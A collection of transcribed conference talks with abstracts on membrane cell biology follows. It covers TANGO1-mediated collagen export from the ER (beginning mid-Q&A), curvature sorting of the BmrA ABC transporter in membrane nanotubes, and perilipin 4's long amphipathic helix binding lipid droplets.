So we can knock down these chaperones and we see an effect. But that doesn't give us the mechanism. So we are trying to figure it out in vitro - I don't think we'll be able to do it. That's why we went into Pichia pastoris. We are doing that with Ben Glick. But yeah, I mean, what you're saying, it's reminiscent of creating a translocon-type structure, which is using TANGO1 and its force to move. We're also looking for an ATPase in the lumen of the ER to help perform this function. Yeah, they should be doing it, but still you need an ATPase. Yeah, Tommy. I might have missed it, but what do you think about the dissociation of the collagen from the chaperone? Like after the pushing, do you need to best... Well, there are two ways of doing it. One is you make life very difficult and you invoke another protein. The alternative is very simple. The binding of SH3-like domains to their targets is weak affinity, very weak affinity. So if a molecule which is about 900 amino acids - about over 1,000 amino acids, 900 are unstructured - one possibility is that it can only extend up to this distance. It cannot go like so, and therefore it dissociates. It's simply a conformational change. And then... So going back to the translocon model, the push is constant. And then, anyway, from your pictures, it looks like it's a translocation through some sort of a pore. Actually, when we started to work on procollagen many, many years ago, the idea was to synchronize the folding of procollagen in the endoplasmic reticulum. This allowed us to generate large aggregates in the endoplasmic reticulum, very large, one micron by one micron. So when you release the block of secretion - it's complicated to explain now - although they're so big, they go out easily. How does that fit with your models? Certainly not with a simple translocon through a pore, because that would have to be huge. Well, why not? I mean, the thing is that, you know, we're not saying that this is a translocon in the sense of a 9 nanometer pore. This might be much bigger. I don't know, we should do it in chondrocytes the way that you guys did it, where you accumulate so much collagen and then you release it all in one shot. We haven't done that because, as is, they are so big to get them out. I expect that when you have such a massive efflux, there must be major reorganization. It would be terrific to know what happens to the ER exit site. We haven't looked at that, but it would be worth doing. I had a question myself. So, basically, in your model, where you think that to enlarge this kind of carrier you need fusion of all these molecules - so to get fusion and to get this increase of area, you need to have a barrier somewhere. Otherwise, you will... So, basically, it means that... The ring is the barrier... is the barrier, right? Yes, the barrier. Call it a fence, call it a fence, call it a ring. But this is the... This is the ring. The TANGO1 is the barrier, right? So, I can also show you images of basically the organization of the proline-rich domains, etc. So, they all seem to be... Ordinarily, TANGO1 starts off like this, and then it opens like this as the tunnel is growing. And it just remains here, and then it keeps moving down. So, we have all of those images. But those are images. We'd like to be able to do more than that. But I think what you're doing is you're making a fence, a line, and everything happens within that area, and this restricts, and then you're... So much you can... Yeah. That was to me... Tom... Maybe here. Mark. Quick question. 
So, Michael Rape has found that the COPII - one of the COPII proteins, or several of the COPII proteins - needs to be ubiquitin-modified in order to package collagen. Where does that fit into this story? How does that... Do you incorporate that at all, or just forget it all? I mean, I was in Randy's lab for six months, two years ago, and I basically... We don't see that. They basically say that KLHL12 is ubiquitinating Sec31. But where? It's six years ago that that paper was published, right? I would like to know where that thing is getting ubiquitinated, and there's a paper that's going to come out shortly - it's not my paper - where the authors of this new paper claim that this whole KLHL pathway is found on containers that contain COPII, but they're not going to the Golgi. They're going to lysosomes for degradation. So we had not seen any effect of KLHL12, etc., etc., in our pathway. We don't see its role in secretion, but I don't want to just... I just decided not to go there. Very quick question. So, back to this model, the connection between the ER and the Golgi. If you're getting lots of collagens trying to come out from all the ER exit sites, most of them should be constipated. Who should constipate? The ER should become constipated, because there are only a limited number of regions where the Golgi is in contact with the ER. So most of the sites would not be associated with Golgi. So all those sites should be constipated, and you should have all the collagens stuck if there were a conduit kind of approach. But is there any evidence that you need to give some losing things? That's why I didn't go into medicine, because I just don't think I could answer that. I really don't know. I mean, I think I'm just basically presenting you what I think... What I don't have is not there. I mean, there are lots of questions that one could challenge. I mean, there's a recent paper from Maria Leptin's lab that a protein called Dumpy, which is the largest protein known to anyone - it's Dumpy, it's in flies, Drosophila - it is even bigger than collagen, and it requires TANGO1, Drosophila TANGO1, for its exit from the ER. So, you know, this is where most of the work is going to go. People are going to say, this cargo also requires TANGO1, et cetera, et cetera, et cetera. The difficult questions are, in my opinion, whether there is a tunnel, or whether there really is a sort of transport carrier. Number two, the directionality. Somebody, you know, Eve said, you know, how do you move it in that direction? I think this is very crucial. And then this business of how do you control how much collagen goes out, because it depends on the type. So we think when there is a small amount of collagen, you have rings of about 300 nanometers. And if you need to export even bigger amounts, as you say, then what happens is these rings have the capacity to... It's like a fence. It fuses to the fence on the side, and what you do is you create a bigger structure. And so you can push even more out. But those things at the microscopy level are very difficult. And at the biochemical level, all you're looking for is an increase in the number of molecules. And this is not at the surface. We're looking at something that happens inside the cell, which makes it a little difficult, I think. But so, I think in my opinion, these are the two or three questions that we are trying to address. And we thought of doing everything in vitro. We were able to purify TANGO1, but it collapses. So it's very, very hard to work with. 
That's why we decided to go into Pichia. And then we are trying to create in Pichia the ability to express it. So we can do it with TANGO1. That's no problem. Will they generate bones? Will they generate bones? I don't know, but we are... So there are four minimum... You need four proteins. That's a must. No, no, no, no. I'm not trying to make a bony yeast. But what I'm trying to do is I'm trying to ask, can we get collagen to leave the ER with the following set of proteins: three enzymes, collagen type four, which is the easiest collagen to work with, and TANGO1. That's all we care about. What happens once it comes out, whether it goes to the Golgi and how it gets sorted, is someone else's business. I think this would be sufficient. So that's where we go. Thank you very much. Thank you.
|
Secreted collagens compose 25% of our dry body weight and are necessary for tissue organization, and for skin and bone formation. But how are these bulky cargoes, which are too big to fit into a conventional COPII vesicle, exported from the ER? Our discovery of TANGO1 (Bard, Nature 2006; Saito, Cell 2009; Saito, Mol Biol Cell 2011; Santos, J Cell Biol 2016; Malhotra, Ann Rev Cell Dev Biol 2019), a ubiquitously expressed, ER-exit-site-resident, transmembrane protein, has made the pathway of collagen secretion amenable to molecular analysis. TANGO1 acts as a scaffold to connect collagens in the lumen to COPII coats on the cytoplasmic side of the ER. However, the growth of the collagen-containing mega transport carrier is not simply by accretion of a larger COPII-coated patch of ER membrane, but instead by rapid addition of premade small vesicles. This mode of transport carrier formation is fundamentally different from that used to produce small COPII vesicles. We have seen that TANGO1 rings the ER exit site and thus organizes a subcompartment within the ER (Nogueira, eLife 2014; Santos, eLife 2015; Raote, J Cell Biol 2017). We have now mapped all the components that work in concert along with the cargo to assemble TANGO1 into a ring (Raote et al., 2018. In review). Mathematical modelling, biochemistry and super-resolution microscopy based analyses of this process will be discussed. TANGO1-family proteins (cyan) assemble into a ring at an ERES through interactions 1. with COPII (orange), 2. with triple-helical collagen (purple), 3. amongst the TANGO1 family proteins, and 4. with the NRZ tether (dark blue), which links TANGO1 to ERGIC membranes. TANGO1 acts as a lineactant, delaying the binding of the outer COPII coat and allowing for the formation of a mega-carrier.
|
10.5446/50910 (DOI)
|
Thanks for selecting me for a short talk. I'm a postdoc researcher at the Institut Curie working with Patricia Bassereau. I'm working in collaboration with Daniel Levy and Maxim Dom from the Institut Curie. I'm going to introduce my ongoing work on conformational-dynamics-related protein distribution on membranes. It's a cross-talk between the conformational dynamics of a transmembrane protein and biophysical properties of the membrane such as curvature or tension. As we all know, cell membranes are a two-dimensional sheet in which transmembrane proteins are embedded, along with peripheral membrane proteins. Some transmembrane proteins, such as the ABC transporters, are among the major classes of transporters, involved in transport activity and lipid flippase activity. In particular they are involved in multi-drug resistance in cancer cells, and they also confer drug resistance in bacterial cells. I'm working with a bacterial ABC transporter which has an open conformation. An ATP-driven conformational change exports the drug: it has an open conformation, ATP binds, it closes, and then the drug is translocated outside the cell. So it has two shapes: one is conical, one is cylindrical. What happens when the protein goes through its conformational dynamics inside the membrane? It means that the motion of the transmembrane part is conveyed to the bilayer, so the bilayer curvature is also changing upon the dynamics. So what is the cross-talk from the conformational change to the membrane, and what happens to the conformational dynamics when we fix certain biophysical parameters of the membrane? It's a cross-talk in both directions. Recently, Daniel Levy's group has shown that the open conformation, which is conical, has a spherical arrangement - they form ring-like structures - whereas when you inhibit with orthovanadate, the ATP cycle gets arrested, you have a cylinder-shaped protein, and you usually end up getting a ribbon-like structure. So what happens here is that whenever there is a protein inclusion which has a curvature, a conical shape, you have a membrane strain, whereas when the protein has a cylindrical shape, which has no curvature, there is no curvature-induced membrane strain. So the conformational change goes from conical to cylindrical, and I'm going to talk about what the effect is on the membrane. To study this - a bit about the physics: for a flat membrane you can define the bending of the membrane. When you have insertion of a protein, the spontaneous curvature induced by the protein comes into play, and this bending energy can be reduced: the effective spontaneous curvature of the protein drives the recruitment of the protein to the curved surface to minimize the bending energy of the membrane, and that's how curved proteins try to enrich into curved membranes, and that's how membrane curvature drives the sorting of curved molecules like conical transmembrane proteins or helical insertions. Our lab developed a tool to study how we can play around with membrane curvature and protein sorting. We grow giant unilamellar vesicles - this is a minimal in vitro reconstituted system with purified minimal components - where you have a lipid membrane, you reconstitute your protein, and you pull a membrane nanotube with optical tweezers, and you can play around: you have an almost flat surface, you have a curved surface, you can go from 100 nanometers to 10 nanometers, you can control the membrane tension, you can play around with the force. 
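For readers who want the formula behind this sorting argument, a standard way to write it is sketched below; this is generic Helfrich membrane elasticity rather than anything specific to this talk, and the linear expression for the effective spontaneous curvature is only a lowest-order approximation.

```latex
% Bending energy per unit area of a membrane with total curvature C,
% bending rigidity \kappa, and an effective spontaneous curvature \bar{C}
% set by the area fraction \phi of curved inclusions of intrinsic curvature c_p:
f_{\mathrm{bend}} \;=\; \frac{\kappa}{2}\,\bigl(C - \bar{C}(\phi)\bigr)^{2},
\qquad
\bar{C}(\phi) \;\approx\; \phi\, c_p \quad \text{(lowest order in } \phi\text{)}.
% On a nanotube C ~ 1/R, so enriching conical proteins (increasing \phi)
% moves \bar{C} toward 1/R and lowers the bending energy: this is the
% thermodynamic driving force for the curvature sorting described above.
```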
So this is a very good system and we can calculate the protein enrichment from the flat to the curved surface. Our lab has shown that KvAP, which has a conical shape, has a preference for the curved surface, whereas aquaporin, which is cylindrical in shape, doesn't have any preference for the flat or curved surface. But this protein has both shapes, conical and cylindrical, and it goes through a dynamic state, so I'm going to take the open conformation, the closed conformation, and the dynamic state and see what happens. But first I need to reconstitute my protein: we reconstituted the open conformation - this is the most challenging task - and then we reconstituted the closed conformation. I want to remind you here that when we do the reconstitutions by electroformation, we usually have a both-leaflet, or symmetric, reconstitution of the protein in both cases, so I'm going to use this symmetric reconstituted system. Let's talk about the closed conformation, which we got in the presence of orthovanadate; this is the fixed conformation, and we reconstituted this protein. We pull the tube and we start increasing the tension, as you can see from the movie. When we increase the tension we modulate the radius, and as we modulate the radius you can see here that the protein is sorting: there is no protein, then as you increase the tension you are decreasing the radius, and then the protein sorting starts. So the relative enrichment is calculated, and the radius we calculate from the fluorescence - we can't calculate it directly from the tension; there is a relation from tension to radius, but when we have the proteins the correlation doesn't hold very well - and we plotted our protein enrichment versus curvature. It depends first on the protein density on the surface, and the protein enrichment also has a curvature preference, around 20 nanometers here. So the lower the protein density on the surface, the easier it is to flow through the neck: the protein is flowing from the flat surface to the curved surface, lipid is flowing from outside, so there is mixing, and this allows the reduction in bending energy due to the spontaneous curvature. And after fitting our curve with the model, we deduced a curvature of the protein of around inverse 6 nanometers. Initially we presumed that the protein is cylindrical, but it is not cylindrical, it has a spontaneous curvature, and this goes well with the crystal structures of other ABC transporters. And so here what we propose is that the proteins which are inside-out are sorting into the tube, which has a preferred curvature from the inside. 
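As a concrete illustration of how such numbers are typically extracted in tube-pulling experiments of this kind, here is a minimal sketch; the relations used (tube radius from tension, sorting ratio from the two fluorescence channels, radius from the lipid signal) are the standard ones in this field, while the intensity values, rigidity, tension and calibration constant below are made-up placeholders, not data from the talk.

```python
import math

# --- Tube radius from membrane tension (protein-free limit) ---
# R = sqrt(kappa / (2*sigma)); kappa = bending rigidity, sigma = membrane tension.
kappa = 20 * 4.11e-21      # ~20 kBT in joules (typical lipid bilayer rigidity)
sigma = 1e-5               # membrane tension in N/m (placeholder value)
radius_m = math.sqrt(kappa / (2 * sigma))
print(f"expected bare-membrane tube radius ~ {radius_m * 1e9:.0f} nm")

# --- Relative enrichment (sorting) from fluorescence ---
# S = (I_protein_tube / I_protein_GUV) / (I_lipid_tube / I_lipid_GUV)
# The lipid channel normalises away how much membrane is in the tube.
I_prot_tube, I_prot_guv = 50.0, 10.0     # placeholder intensities
I_lip_tube, I_lip_guv = 2.0, 10.0        # placeholder intensities
sorting = (I_prot_tube / I_prot_guv) / (I_lip_tube / I_lip_guv)

# --- Tube radius from the lipid fluorescence itself ---
# R ~ K * (I_lipid_tube / I_lipid_GUV); K is a calibration constant
# measured on protein-free tubes of known radius (placeholder value below).
K_nm = 200.0
radius_from_lipid_nm = K_nm * (I_lip_tube / I_lip_guv)

print(f"relative enrichment S ~ {sorting:.1f}")
print(f"tube radius from lipid signal ~ {radius_from_lipid_nm:.0f} nm")
```

In practice the calibration constant is determined on protein-free tubes whose radius is known independently, which is why the lipid channel can still report the radius even when, as mentioned above, the protein makes the tension-radius relation unreliable.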
Let us take an example of the open conformation. Here I pull the tube and I waited for 15 minutes; I am not changing any tension, I am not modulating my radius - the protein itself modulates it. It sorts, it reaches the curved surface, and it remodulates the radius and it reaches 30 nanometers. So the enrichment in the tube is almost 30 times, and it automatically modulates the radius from 100 nanometers to 30 nanometers - it always reaches 30 nanometers. You can see here sometimes you have huge clusters, and there might be phase segregation. So here the proteins which are sorting are the ones facing outside in the leaflet; here the protein is not sorting from the inside. And here our curvature for this one is 30 nanometers; from the previous cryo-EM images they came up with a radius of 15 nanometers. So you have to keep in mind that this radius which we are calculating comes from the transmembrane domain and its interplay with the lipid bilayer, but it is also coming from the extracellular domain. So we have to keep in mind there might be protein-protein interactions - we are not ruling that out, because we do not know whether it is a cluster or not, and there is a crowding effect, because we have almost 50 times enrichment in the tube. Now let us take an example of ATP-driven ABC transporter dynamics, where in the presence of ATP you can see that when it is open there is one curvature, and when it is closed you have another curvature. So the sign of the membrane curvature is changing upon the ATP cycling. So in this experiment what I did is I pulled the tube in the open conformation - there is protein enrichment - and then I added ATP on the tube, from here, and what we observed is that the protein which was enriched in the tube just went back to the flat surface, and this decreases with time and then it goes to a steady state. So in the dynamic state - you have to remember that we have a symmetric reconstitution - when I add the ATP only the outside-facing molecules are in a dynamic state; the inside-facing molecules are always open. So when I add it, when they are in the tube, the outside-facing protein is on the wrong side, it does not have a preferred curvature, so they move out. And the good part is that it is otherwise impossible to check the activity of the protein in these giant unilamellar vesicles, so here we have shown first that the protein is active. In conclusion, I want to say that the ABC transporter has dynamics: the closed conformation has a membrane curvature of around inverse 90 nanometers, it has a conical shape, it is not a cylindrical shape. The apo form modulates the membrane curvature by itself and it reaches almost 30 nanometers. My protein is active, and in the dynamic state, because of the flexibility and negative curvature preference, they move out to the flat surface. And so for BmrA in my experiments I propose that BmrA stays longer in a post-hydrolytic conformation during the cycling state, and our observation is orthogonal to the rest of the experiments, which propose that the BmrA ABC transporter will stay in the open conformation for a longer time. Thanks to Patricia Bassereau, to our groups and the funding agencies, and I also want to mention Daniel, who is preparing the proteoliposomes, and also the other collaborator, Maxim Dom. Thank you very much. So what would happen if you drive the ATP hydrolysis inside of the GUV, by let's say optical methods, right, and caged ATP? So you are adding the ATP from inside. 
So one part is technical: okay, when I am going to add the ATP inside, then the proteins which are going to cycle are the ones facing the inner leaflet of the bilayer, and in that case they have the wrong preference of curvature. So usually they will just... So in this case, if they start pumping out - there is also the physics - they will cluster first, that's for sure, because not all the proteins are going to be synchronized in one conformation. So probably one conformation - a population in one conformation - will drive the formation of a cluster. So we will have two sorts of clusters, but again it's in a dynamic state. So it's very hard to say what's going to happen, frankly. We can have two questions. All right. I like that. Is there any evidence that in the cell you have some sorting based on the conformational state of the protein? Okay, for in vivo observations, there are some observations where you have curved membranes and you have some of the transporters there, on the curved membranes, but as such there is no direct evidence that the transporters are clustering. It's just a theoretical model, proposed in '86, that says that if the proteins are curved they will cluster. So that's a logical conclusion in physics, that if they are curved they will cluster. Did you have a question? Oh yeah. So along the same line, what is the implication for in vivo? Because what's the density of this protein in normal cells, and there will be other proteins in normal cells. So what can you think about - what's the physiological importance of this, if there is any? So when the cell is in a dynamic state you have a lot of curved surfaces, like whenever the cell is dividing or you have protrusions of the cells or so. Usually - I'm not correlating my concentration with the in vivo situation - but the sorting at the curved surface makes sense in that it needs a transporter, because this ABC transporter, or the lipid flippases also - they usually would cluster at the neck or the curved membrane, and depending on the scenario, if they want to have export of the molecules or metabolites or anything, they will do those functions there. Or even in the curved membrane, people propose that lipids need to be flipped so that they do these functions properly. So this is - but I'm not correlating the concentration in vitro with the in vivo.
|
Integral trans-membrane proteins are involved in various cellular functions and their dysfunction is associated with human pathologies [1]. Lipid-protein interactions have been studied to address the structure-function relationship of transmembrane proteins at the molecular level. However, the effects of membrane physical properties on trans-membrane proteins have not been well studied, and not at all when their conformations change. Recent experimental evidence indicates an intrinsic interplay between protein shape and the properties of its membrane environment [2,3]. It is expected that non-cylindrical proteins tend to cluster and be enriched in curved membranes. Thus, we studied BmrA, a bacterial ATP binding cassette (ABC) transporter from B. subtilis involved in export of a large diversity of substrates in an ATP dependent manner, fairly homologous to human P-glycoprotein [4]. The conformational change in the nucleotide-binding domains (NBDs) of BmrA between the apo and the post-hydrolytic state (tweezers-like motion) is 5 nm, which is the largest tweezers motion reported to date for trans-membrane proteins. Here we addressed how the conformational dynamics of BmrA influence its membrane properties, in particular its spatial distribution on flat or curved membranes. To decipher the effect of the conformational dynamics of BmrA on its spatial distribution in membranes, depending on membrane curvature, we used cell-sized giant unilamellar vesicles (GUVs) containing either the apo- or closed-conformation BmrA to form membrane nanotubes with controlled radii. We found that, at low protein density, apo-BmrA is highly enriched (50 times) in nanotubes as compared to flat membrane and simultaneously modulates the tube radius from 100 nm to 30 nm, due to its high intrinsic curvature. Surprisingly, although the post-hydrolytic closed-conformation BmrA is expected to be cylindrical, we measured an enrichment of this conformation in nanotubes, but about 3 times less pronounced than for apo-BmrA. Eventually, in the presence of ATP, BmrA has reduced curvature selectivity as compared to the apo form, in agreement with a cycling change of conformation between the apo and the closed forms. This study on reconstituted transmembrane proteins demonstrates that protein distribution on membranes is influenced by the interplay of membrane curvature, effective shape and flexibility of membrane proteins.
|
10.5446/50911 (DOI)
|
So actually I'm going to talk about lipid droplets, which are very peculiar organelles in the cell, because they are an organelle that is not surrounded by a membrane but instead by a phospholipid monolayer. And a lot of proteins have to localize to lipid droplets, and a lot of them use an amphipathic helix to target lipid droplets. So what you want to understand is why a protein goes to lipid droplets and not to another organelle that is surrounded by a bilayer. And so in order to answer this question, I started looking at this protein family called the perilipins, which are really the hallmark mammalian lipid droplet proteins. So there are three perilipins that have been studied a lot; they localize to lipid droplets and all of them contain in their sequence a predicted amphipathic helix region. But there's another protein in the family that's really striking. It's called perilipin 4. It hasn't been studied very much, but this one has a predicted amphipathic helix region of almost 1000 amino acids in the human sequence. So it seemed like a really good candidate to study targeting to lipid droplets by an amphipathic helix. And so not only is it very long, but it's also extremely repetitive. So the sequence is composed of these 33-mer repeats, and in the human version you can identify about 29 repeats. And here I'm showing you a plot - this is an alignment of the repeats from the human protein. So you can see how in many positions of the repeats you always have the same amino acid. And so when you plot this one repeat on a helical wheel you can see that it could form an amphipathic helix. So it has a hydrophobic side and it has a polar side. And actually you can see that the hydrophobic side is not very strong, so you don't have any large hydrophobic residues. And we can purify these peptides and look at whether they are structured by CD spectroscopy. And when you look at the protein in solution, it really has this typical signature of an unfolded protein. But then when we increase the concentration of lipids in this mixture, we get a really nice helical signature. And this is over 400 amino acids. Actually we have gone up to 660 amino acids. So it's really by far the longest consecutive amphipathic helix - not just amphipathic helix, any helix - that we know of. So what you're saying is that it doesn't have any good structure. No, it's completely unfolded in solution. And actually this is how we purify it. Right. So then we can ask, okay, does it go to lipid droplets? And so we express this protein in HeLa cells fused to mCherry. And you can see that there's a lot of cytosolic signal, but then it also surrounds lipid droplets, which are here labeled in green. And the localization to lipid droplets really depends on the length of the protein. So if we have a short sequence, like 2 of the 33-mers, or 66 amino acids, it doesn't go to lipid droplets. But as we increase the length, the targeting to lipid droplets becomes really efficient. So then we can also look at the sequence of the helix to see what are the parameters that are important for targeting. And as I've told you, it's really not a very hydrophobic helix. But it has a lot of threonines, for example. So the first thing I wanted to ask is how does hydrophobicity affect targeting? Because if you imagine, this is a helix that should interact with lipids over a long interaction surface. So we don't want to make big mutations, but instead we make small mutations and repeat them along the length of the helix. 
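To make the helical-wheel argument concrete, here is a small sketch of the kind of calculation behind it: the mean hydrophobicity and the Eisenberg hydrophobic moment of a 33-residue repeat, and how small substitutions repeated along the repeat (such as the threonine-to-valine or threonine-to-serine swaps discussed next) shift the mean hydrophobicity. The 33-mer below is an invented placeholder with roughly the described composition (threonine-rich, weak hydrophobic face, net charge about +1) - it is not the real perilipin 4 repeat - while the Kyte-Doolittle scale and the 100 degrees per residue periodicity are the standard conventions.

```python
import cmath

# Kyte-Doolittle hydropathy values (standard scale).
KD = {'A': 1.8, 'R': -4.5, 'N': -3.5, 'D': -3.5, 'C': 2.5, 'Q': -3.5,
      'E': -3.5, 'G': -0.4, 'H': -3.2, 'I': 4.5, 'L': 3.8, 'K': -3.9,
      'M': 1.9, 'F': 2.8, 'P': -1.6, 'S': -0.8, 'T': -0.7, 'W': -0.9,
      'Y': -1.3, 'V': 4.2}

def mean_hydrophobicity(seq):
    return sum(KD[a] for a in seq) / len(seq)

def hydrophobic_moment(seq, delta_deg=100.0):
    # Eisenberg moment per residue: |sum_n H_n * exp(i*n*delta)| / N,
    # with delta = 100 degrees per residue for an alpha-helix.
    total = sum(KD[a] * cmath.exp(1j * cmath.pi * delta_deg * n / 180.0)
                for n, a in enumerate(seq))
    return abs(total) / len(seq)

# Invented 33-mer placeholder (NOT the real perilipin 4 repeat sequence).
repeat = "MTVGTKAGDVAHTATSVGTKAEQVSHTATGVAK"
variants = {
    'wild-type-like': repeat,
    'T->V (more hydrophobic)': repeat.replace('T', 'V'),
    'T->S (less hydrophobic)': repeat.replace('T', 'S'),
}
for name, seq in variants.items():
    print(f"{name:26s} <H> = {mean_hydrophobicity(seq):+.2f}  "
          f"muH = {hydrophobic_moment(seq):.2f}")
```

On this scale the T-to-V variant gains a lot of mean hydrophobicity while T-to-S loses only a little per residue, which fits the idea that very small per-residue changes only matter because they are repeated over a very long helix.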
So here, for example, I'm mutating threonines into valines or serines, which are either a little bit more or a little bit less hydrophobic. And if you increase the hydrophobicity just by a little bit, now the helix starts to localize very efficiently to lipid droplets. Whereas if you decrease it, by mutating threonine into serine, you lose all lipid droplet targeting. And then another thing happens. So if it's more hydrophobic it goes to lipid droplets better, but you can see also that the cellular pool of the helix changes. And in fact we can see that if it's more hydrophobic it starts to invade very efficiently other cellular membranes. So here, in a cell that is expressing the protein more highly, you can see a very strong endoplasmic reticulum signal, but it probably goes to all sorts of membranes. Whereas where you have low-level expression you see primarily lipid droplets. So from this we can conclude that both length and hydrophobicity improve binding to lipid droplets. But in fact if you're more hydrophobic then you lose specificity - you become more promiscuous for other membranes. So there's something about the surface of lipid droplets that makes them really sticky, so that an amphipathic helix can bind very easily. So we wanted to understand what that is. So for that we do experiments in vitro with purified protein. We can label the protein with NBD so that it's fluorescent, and the fluorescence depends on whether it's in a hydrophobic environment, and test how it binds to bilayer liposomes. So we have prepared liposomes where we vary the composition. For example, we increase the mono-unsaturation of the phospholipids, which interferes with the packing of phospholipids. We increase the charge. We increase curvature. We add diacylglycerol. And actually the wild-type amphipathic helix really doesn't want to bind to bilayers, whereas if we use this mutant that is more hydrophobic, now we have very promiscuous binding to all sorts of liposomes. And in fact there was only one composition that we could find for the liposomes that was efficient at recruiting this amphipathic helix. And this is an artificial acyl chain that you can buy, in phospholipids that contain methyl groups - so you have a methyl group every four carbons. So you can see here, this is this diphytanoyl lipid. So these methyl groups prevent efficient packing of the phospholipids. So again you get a surface that is not very well packed. And so this surface is good for binding of our amphipathic helix. But obviously, what does that have to do with lipid droplets? So one thing that I've told you about lipid droplets: they don't have a bilayer, they have a monolayer. So unlike a bilayer - in a bilayer you have the two leaflets coupled - here the monolayer can spread. So the phospholipids can spread on the surface, and this will increase the surface tension of the lipid droplet. So such lipid droplets are going to become unstable and they will fuse. So we thought that maybe this characteristic of the lipid droplet would be important for targeting of the amphipathic helix. So for this we decided to do an extreme-case experiment. So let's imagine that we have only neutral lipids and we don't have any phospholipids. What will happen? It's a very crude, simple experiment. So we have a solution of protein, we add a droplet of oil, we vortex really hard. And as you can see, as you increase the concentration of protein in the solution, you get, after vortexing, increased turbidity. 
And if we put this mixture under the electron microscope, you can see that small oil droplets have formed. And you can also look at them by dynamic light scattering, and they have quite uniform size, in the range of a few hundred nanometers. And if we use in this experiment the mutant protein that didn't go to lipid droplets in the cells, now we don't see any formation of droplets by dynamic light scattering. And we can also label the protein fluorescently and look under the fluorescence microscope, and you can see, in the bigger droplets, the fluorescent protein very nicely surrounding the neutral lipid core. And so it looks like this amphipathic helix can in fact replace the phospholipids. So it's acting like an emulsifier in place of phospholipids. So obviously this is a very artificial in vitro experiment, so we wanted to see if there's any evidence for that in the cell. So for this we use Drosophila cells, because Drosophila has been used a lot in screens to determine protein factors that are important for regulating the size or distribution of lipid droplets. And one protein that came out of these screens is this protein called CCT1, which is an enzyme that catalyzes the rate-limiting step in the synthesis of phosphatidylcholine. So the phenotype that you get when you deplete CCT1 is that lipid droplets get bigger. And the explanation for that is that because you don't have enough phospholipids, the lipid droplets are fusing. So if the amphipathic helix can do the same thing as phospholipids, that means that we should be able to rescue the size of the lipid droplets under these conditions. And this is indeed what we see in the experiments here. I'm showing the experiment where we deplete CCT1, and you can see that in the cells that are not expressing the protein the lipid droplets get very big. But when we have the protein expressed, the size of the lipid droplets is rescued, which you can see quantified here compared to the control experiment. So from this we conclude that perilipin 4 is an amphipathic helix that is really optimized for interacting with neutral lipids over a long surface, and it can act as a coat to form these droplets. And so this could be important in the cell under conditions when, for example, you don't have enough phospholipids: you could quickly snap the protein on to stabilize the lipid droplets. So I like to imagine this protein as a millipede, because you have lots of legs and it interacts weakly with the surface. But actually I'm just going to show you one piece of data showing that this millipede model is really not very good, because if you go back to this mutational analysis, one thing I didn't talk about is the charge of the amphipathic helix. So on the polar side of the helix you have quite a lot of charged residues. So actually throughout the sequence the net charge is always plus one. So I tried mutating this charge, mutating residues to either reverse the charge or to increase the charge. In all cases we decrease the binding to lipid droplets. But one strange thing is also that the charge is always asymmetrically distributed, which is kind of unusual, because if you want to interact with the surface you would want to have the charge close to the surface. So this is the case that I'm showing you here. So we asked what will happen if we keep the composition the same but we kind of redistribute the amino acids to make them as symmetrical as possible. 
So in this case we also decrease the binding of the protein to lipid droplets. But we can also express these proteins in yeast, which I'm very happy about because I'm a yeast person at heart. So in yeast it also goes to lipid droplets, so these targeting mechanisms are very conserved, but actually it goes to the plasma membrane quite efficiently. And so if we compare the targeting of the wild-type protein and the protein that has this charge swapped, we can change the ratio between the plasma membrane and lipid droplet signal, which correlates with the distribution of charge. And so we propose that in this protein the charge is actually mediating inter-helical interactions, to kind of form a meshwork on the surface of the lipid droplets to stabilize them. So I worked as a researcher in the lab of Cathy Jackson, and I have shown you the work of three people. Manuel is a PhD student, and two engineers have done a lot of the experiments that I have shown you, and we have done this work in collaboration with the group of Bruno Antonny - so all the liposome experiments that I have shown you and the CD spectroscopy have been done by Bruno and Marco Mani. And thank you very much for your attention. So you mentioned the changes in droplet size as a consequence of either phospholipid metabolism or the protein expression. Are there changes to the metabolism of neutral lipids in these droplets? Do you see changes in, I mean, cholesteryl ester hydrolysis for example, or is it very nonspecific in some way? Is there a rate of cholesterol? So you mean when we have the amphipathic helix present? We haven't done these experiments. We have looked a little bit at whether the composition would affect targeting, and we see some differences, but yeah, we don't know. What do you think is the function in the cell of these lipid droplets? I mean, I know that inside they have many lipids that maybe are sequestered, but what is the function of having proteins outside? Is this like a parking club for proteins that are supposed to be in membranes? So lipid droplets are really important for lipid metabolism. So one thing is, if you have too many - for example, fatty acids are toxic - you need to store them as triglycerides, and then when you need energy you recruit lipases that degrade the triglycerides and the esters. What is the function of some proteins getting between them and membranes? Of the proteins which are on the lipid droplet membrane? So you have a lot of enzymes, and then these perilipins, for example, don't have enzymatic activity, so they have been proposed to act as - I mean, they can recruit others; perilipin 1, for example, recruits lipases, so they should regulate. So in both metabolism - I noticed there is TIP47, which also supposedly has a role in protein trafficking, so why is it in both places? Do you have - I mean, why are proteins in both places which are not lipid metabolism? The role of TIP47 in trafficking is a little bit under question. So it was originally proposed to be involved in trafficking, but actually it seems to localize really well on lipid droplets, and so all the function correlates with... Maybe it's not contradictory; maybe it's just, as I said, a parking lot for... 
Yeah, but actually, I mean, lipid droplets are really connected with - I mean, they are connected with the endoplasmic reticulum, they have a lot of contact sites with other organelles, so they're really an integral part of the cell; you have a lot of trafficking through the lipid droplets to the organelles. So maybe I missed it in what you said, but do you have a mechanism observed, or in mind, whereby the lipid droplets - let's say you get rid of the... So how do you get the protein off? Yeah, because yeah. We don't know. So one speculation would be that you can imagine it happens by phosphorylation, because we know that when the charge changes it doesn't bind, and it has all these threonines and serines, so you could imagine that if you phosphorylated it you could very quickly take it off. But that's completely speculation; we have no evidence for that. Is there a differentiation among lipid droplets? Are there, in the cell, different kinds, with different compositions, different contact sites perhaps? So it's something that's very much under study. There are some suggestions in the literature that you have differences in composition - at least in some cell types you seem to have differences in the composition of the core of lipid droplets, and some perilipins prefer cores with more triglycerides, others with cholesterol esters. We have tested this a little bit in yeast and we don't see a difference. And then you also have some lipid droplets, for example, that are in close contact with peroxisomes, or more in contact with the endoplasmic reticulum, and there seems to be some specialization, but this is not very well understood - but it's being studied a lot. Alright, so thank you very much.
|
